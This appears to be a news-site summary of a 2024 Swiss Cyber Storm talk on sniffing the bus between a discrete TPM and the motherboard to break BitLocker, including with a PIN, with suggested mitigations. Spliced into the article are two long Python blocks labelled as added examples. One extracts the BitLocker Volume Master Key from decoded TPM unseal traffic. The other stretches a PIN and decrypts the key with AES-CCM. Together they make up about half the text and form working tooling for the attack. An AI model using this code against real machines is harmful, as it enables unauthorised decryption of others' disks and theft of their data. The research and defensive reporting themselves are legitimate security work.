Decrypt LOL
Swiss Cyber Storm Conference Discusses TPM Sniffing Attack Vulnerabilities

Quick take - At the Swiss Cyber Storm conference in October 2024, researchers presented work on TPM sniffing attacks: by tapping the unencrypted link between a discrete Trusted Platform Module (TPM) and the motherboard, an attacker with physical access can capture the key material BitLocker needs during boot, particularly on enterprise-grade laptops. The new results show that adding a Personal Identification Number (PIN) raises the bar less than expected, since someone who knows the PIN (a rogue employee, for instance) can combine it with sniffed data to recover the Volume Master Key.

Fast Facts

  • TPM sniffing attacks exploit two weaknesses in how a discrete TPM is attached to the motherboard: the bus traffic is unencrypted, and it is slow enough to capture with inexpensive hardware, so key material can be read off the wire during boot.
  • The research team reproduced the original attack in 2020 and sped it up considerably; the current method breaks BitLocker on enterprise laptops in a few minutes and works well against Lenovo, HP and Dell devices.
  • A project started in early 2024 examined BitLocker with TPM plus PIN. Sniffing the TPM alone no longer yields the Volume Master Key (VMK): the unseal response does not contain it, which initially suggested the PIN acts as a verification step rather than directly as a decryption key.
  • Reverse engineering the EFI bootloader showed how the VMK is actually produced: a nonce is retrieved, the PIN is stretched (salted iterated hashing, as for the recovery key), and the VMK is decrypted with AES-CCM, whose authentication tag tells the bootloader whether decryption succeeded.
  • Recommended mitigations: enable chassis (cover) intrusion detection in UEFI, prefer corporate laptops with firmware TPMs, and monitor workstations for suspicious activity. An additional factor beyond the TPM remains advisable, but a PIN on its own is not a complete protection.

Swiss Cyber Storm Conference Highlights Vulnerabilities in Trusted Platform Module (TPM) Sniffing Attacks

On October 22, 2024, the Swiss Cyber Storm conference in Bern featured a presentation detailing vulnerabilities associated with Trusted Platform Module (TPM) sniffing attacks.

Overview of TPM Sniffing Attacks

These attacks have been documented for at least five years. They exploit two weaknesses in how discrete TPMs are wired to the motherboard: the bus carrying TPM commands and responses is not encrypted, and it runs slowly enough that an inexpensive logic analyser can capture it. With physical access, an attacker can therefore read the key material the TPM releases during the boot process.

The research team behind the presentation first reproduced the original TPM sniffing attack in 2020 and made improvements that greatly reduced its execution time. Their current method breaks BitLocker on enterprise-grade laptops from manufacturers such as Lenovo, HP and Dell in a few minutes. Their Offensive Security division regularly uses the technique during engagements, especially when a laptop can be borrowed from an employee for a short time.
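The capture itself is only half of the attack: once the LPC or SPI traffic has been decoded into raw TPM command and response bytes, the VMK still has to be located in the unseal response. The following is an added example, not code from the presentation or the team's tooling. It assumes the bus capture has already been decoded into per-response byte strings, and the 12-byte key-entry header it searches for is the marker public TPM-sniffing write-ups use in front of the VMK (an assumption to verify against your own capture); the sample response is constructed locally.

```python
"""Added example: pick the TPM2_Unseal response out of decoded bus traffic and
extract the 32-byte key it carries (TPM-only BitLocker case). Assumes the
capture is already decoded into raw TPM response byte strings."""
import struct

TPM_ST_SESSIONS = 0x8002   # response tag when a session accompanies the command
TPM_RC_SUCCESS = 0x0000
# Header that public TPM-sniffing write-ups search for in front of the VMK:
# a 0x2c-byte BitLocker key entry (12-byte header + 32-byte key).
# ASSUMPTION: verify this marker against your own capture.
VMK_ENTRY_HEADER = bytes.fromhex("2c00060001000000" "03200000")


def parse_tpm2_response(raw: bytes):
    """Split a TPM 2.0 response into (tag, response code, parameter bytes).
    Header is tag(u16) size(u32) rc(u32), all big-endian. With TPM_ST_SESSIONS
    a u32 parameterSize precedes the parameters; the session area follows."""
    if len(raw) < 10:
        raise ValueError("short TPM response")
    tag, size, rc = struct.unpack(">HII", raw[:10])
    if size != len(raw):
        raise ValueError(f"size field {size} != {len(raw)} bytes captured")
    body = raw[10:]
    if tag == TPM_ST_SESSIONS and rc == TPM_RC_SUCCESS:
        (param_size,) = struct.unpack(">I", body[:4])
        body = body[4:4 + param_size]
    return tag, rc, body


def unseal_out_data(params: bytes) -> bytes:
    """TPM2_Unseal returns one TPM2B_SENSITIVE_DATA: u16 length then bytes."""
    (n,) = struct.unpack(">H", params[:2])
    return params[2:2 + n]


def find_vmk(out_data: bytes):
    """Return the 32-byte key that follows the entry header, or None."""
    i = out_data.find(VMK_ENTRY_HEADER)
    start = i + len(VMK_ENTRY_HEADER)
    if i < 0 or start + 32 > len(out_data):
        return None
    return out_data[start:start + 32]


def extract_vmk_from_capture(responses):
    """Walk every decoded response and return the first VMK found, else None.
    Malformed or unrelated responses are skipped rather than aborting the scan."""
    for raw in responses:
        try:
            _tag, rc, params = parse_tpm2_response(raw)
        except ValueError:
            continue
        if rc != TPM_RC_SUCCESS or len(params) < 2:
            continue
        vmk = find_vmk(unseal_out_data(params))
        if vmk is not None:
            return vmk
    return None


def build_sample_response(vmk: bytes) -> bytes:
    """Construct a plausible sniffed TPM2_Unseal response (sample input only):
    header, parameterSize, TPM2B outData, and a minimal empty session area."""
    out_data = VMK_ENTRY_HEADER + vmk
    params = struct.pack(">H", len(out_data)) + out_data
    session = b"\x00\x00" + b"\x00" + b"\x00\x00"   # empty nonceTPM, attrs, empty hmac
    body = struct.pack(">I", len(params)) + params + session
    return struct.pack(">HII", TPM_ST_SESSIONS, 10 + len(body), TPM_RC_SUCCESS) + body


if __name__ == "__main__":
    sample = build_sample_response(bytes(range(32)))          # constructed capture
    print(extract_vmk_from_capture([sample]).hex())
```

In a real capture the decoded stream contains dozens of responses (PCR reads, policy commands, the unseal itself); the scan above tolerates the ones that do not parse as a successful session response instead of stopping at the first oddity.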

New Research on BitLocker and TPM

In early 2024 the team started a new research project into how BitLocker behaves when the TPM-protected key is combined with an additional factor such as a Personal Identification Number (PIN). Before this work, no publicly available tool could break BitLocker in that configuration.

The project began during a penetration test on a laptop protected by TPM and PIN. The team tried a TPM sniffing attack to escalate privileges on the machine but could not retrieve the Volume Master Key (VMK) as expected. Traffic analysis showed that the exchange leading up to the VMK looks much like the one seen when BitLocker runs in transparent (TPM-only) mode, but the TPM's response differs: with a PIN configured, the unseal response does not contain the VMK. At this stage the team suspected the PIN mainly served to authorise the unseal rather than acting as a decryption key.

Insights and Recommendations

Various attempts to decrypt the data returned by the TPM failed, and the internals of BitLocker's multi-factor protection turned out to be largely undocumented. The team therefore reverse engineered the component that performs the decryption: the EFI bootloader, which prompts the user for the PIN and produces the VMK. A debugging environment built on IDA and VMware allowed them to step through the early boot code.

Keyword searches located the EFI module responsible for PIN entry. It is small and consists of low-level assembly-style code, which makes static reverse engineering awkward, so the team switched to dynamic analysis to trace the VMK processing workflow. That workflow involves several steps, including retrieving a nonce and stretching the PIN; the stretching function mirrors the one used for the recovery key and combines iterated hashing with a salt.

The VMK itself is decrypted with AES-CCM, an authenticated mode: the Message Authentication Code (MAC) tag is checked after decryption, which is how the bootloader knows the PIN was correct and the decryption succeeded. The team wrote a Python script that automates these steps and extracts the VMK.
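The two steps above (stretch the PIN, then decrypt with AES-CCM and let the tag decide whether the PIN was right) can be shown end to end. The block below is an added example, not the research team's script. The stretching routine and the nonce || tag || ciphertext blob layout follow the public BitLocker format documentation (as implemented in libbde and dislocker); that the PIN takes the same path as a user password (UTF-16LE, SHA-256 twice, then stretching) and that the stretched value is the AES-CCM key for the blob are assumptions made here. Which sniffed bytes supply the blob and nonce is exactly what the team had to reverse engineer and is not described on this page. The `cryptography` package provides AES-CCM; the salt, nonce and key in the demo are constructed.

```python
"""Added example (not the research team's script): BitLocker-style key
stretching of a PIN, then AES-CCM decryption of a key blob whose
authentication tag doubles as the wrong-PIN check."""
import hashlib
import os
import struct

try:
    from cryptography.exceptions import InvalidTag
    from cryptography.hazmat.primitives.ciphers.aead import AESCCM
except ImportError:            # no 'cryptography' package: CCM part unavailable
    AESCCM, InvalidTag = None, Exception

STRETCH_ROUNDS = 0x100000      # documented BitLocker round count (2**20)
NONCE_LEN, TAG_LEN = 12, 16    # encrypted-key blob layout: nonce || tag || ciphertext


def stretch_key(initial_hash: bytes, salt: bytes, rounds: int = STRETCH_ROUNDS) -> bytes:
    """Documented BitLocker stretching: SHA-256 over the 88-byte structure
    {last_sha256[32], initial_sha256[32], salt[16], counter u64 LE}, 'rounds' times."""
    if len(initial_hash) != 32 or len(salt) != 16:
        raise ValueError("need a 32-byte initial hash and a 16-byte salt")
    last = bytes(32)
    for counter in range(rounds):
        last = hashlib.sha256(last + initial_hash + salt + struct.pack("<Q", counter)).digest()
    return last


def pin_to_key(pin: str, salt: bytes, rounds: int = STRETCH_ROUNDS) -> bytes:
    """ASSUMPTION: the PIN is handled like a user password in the public docs:
    UTF-16LE encoding, SHA-256 applied twice, then stretched with the salt."""
    initial = hashlib.sha256(hashlib.sha256(pin.encode("utf-16-le")).digest()).digest()
    return stretch_key(initial, salt, rounds)


def seal_blob(key: bytes, plaintext: bytes, nonce: bytes) -> bytes:
    """Produce nonce || tag || ciphertext. Used here only to build sample input;
    the library returns ciphertext with the tag appended, so it is re-ordered."""
    ct_tag = AESCCM(key, tag_length=TAG_LEN).encrypt(nonce, plaintext, None)
    return nonce + ct_tag[-TAG_LEN:] + ct_tag[:-TAG_LEN]


def unseal_blob(key: bytes, blob: bytes):
    """Decrypt nonce || tag || ciphertext. Returns None when the tag fails,
    which is exactly how a wrong PIN surfaces: CCM refuses to return garbage."""
    nonce = blob[:NONCE_LEN]
    tag = blob[NONCE_LEN:NONCE_LEN + TAG_LEN]
    ct = blob[NONCE_LEN + TAG_LEN:]
    try:
        return AESCCM(key, tag_length=TAG_LEN).decrypt(nonce, ct + tag, None)
    except InvalidTag:
        return None


def recover_vmk(pin: str, salt: bytes, blob: bytes, rounds: int = STRETCH_ROUNDS):
    """Whole pipeline: stretch the PIN, try the blob, get the VMK or None."""
    return unseal_blob(pin_to_key(pin, salt, rounds), blob)


if __name__ == "__main__" and AESCCM is not None:
    salt, nonce, vmk = os.urandom(16), os.urandom(12), os.urandom(32)   # constructed
    blob = seal_blob(pin_to_key("1234", salt), vmk, nonce)
    print("right PIN:", recover_vmk("1234", salt, blob) == vmk)
    print("wrong PIN:", recover_vmk("0000", salt, blob))
```

The 2^20 rounds cost about a second per guess in Python, which is why the stretching exists: it slows down offline guessing of a short PIN, but it does nothing against an attacker who already knows the PIN and has sniffed the material the bootloader feeds into this decryption. The `rounds` parameter is only there to keep tests fast; a real blob needs the documented count.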

The research shows the limits of relying on a PIN with BitLocker: a rogue employee, who already knows the PIN, could combine it with sniffed TPM traffic to recover the VMK and escalate privileges. To prevent this, the authors suggest enabling cover (chassis intrusion) detection in UEFI, choosing corporate laptops with firmware TPMs (which keep the TPM traffic off an exposed bus), and monitoring workstations for suspicious activity as reasonable ways to reduce the risk.

While the article makes clear that a PIN is not foolproof, it still advises requiring an additional authentication factor when using BitLocker. The research was carried out between July and August 2024, and a similar study by another researcher appeared around the time of publication.

Original Source: Read the Full Article Here